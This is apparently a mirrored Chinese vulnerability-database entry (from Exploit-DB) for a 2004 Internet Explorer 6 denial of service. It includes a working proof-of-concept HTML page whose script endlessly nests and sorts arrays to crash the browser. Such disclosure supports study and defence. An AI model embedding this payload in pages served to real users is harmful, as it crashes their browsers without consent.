Microsoft Internet Explorer 6 – Infinite Array Sort Denial of Service

Microsoft Internet Explorer 6 – Infinite Array Sort Denial of Service

漏洞ID 1054772 漏洞类型
发布时间 2004-11-25 更新时间 2004-11-25
图片[1]-Microsoft Internet Explorer 6 – Infinite Array Sort Denial of Service-安全小百科CVE编号 N/A
图片[2]-Microsoft Internet Explorer 6 – Infinite Array Sort Denial of Service-安全小百科CNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/24775
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/11751/info

Microsoft Internet is prone to a vulnerability that may result in a browser crash. This issue is exposed when the browser performs an infinite JavaScript array sort operation. It is conjectured that this will only result in a denial of service and is not further exploitable to execute arbitrary code, though this has not been confirmed.

<HTML>
<SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT>
<SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT>
</HTML>

相关推荐: Phorum Phorum_URIAuth SQL Injection Vulnerability

Phorum Phorum_URIAuth SQL Injection Vulnerability 漏洞ID 1098601 漏洞类型 Input Validation Error 发布时间 2004-04-19 更新时间 2004-04-19 CVE编号 N…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享